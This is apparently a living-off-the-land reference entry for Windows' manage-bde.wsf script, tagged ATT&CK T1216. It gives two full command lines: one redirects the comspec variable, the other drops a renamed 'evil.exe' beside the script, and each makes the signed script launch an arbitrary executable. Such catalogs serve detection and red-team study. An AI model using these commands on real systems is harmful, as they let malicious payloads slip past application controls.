Manage-bde.wsf

type: OSScripts
Script for managing BitLocker

Full path

C:\Windows\System32\manage-bde.wsf

Commands

  1. ExecuteUser T1216

    Proxy execution from script

    set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf

    Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.

    os: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

    Execute: EXE

  2. ExecuteUser T1216

    Proxy execution from script

    copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf

    Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.

    os: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

    Execute: EXE

Detection

Resources

acknowledgement: Jimmy @bohops, Daniel Bohannon @danielbohannon, John Lambert @JohnLaTwC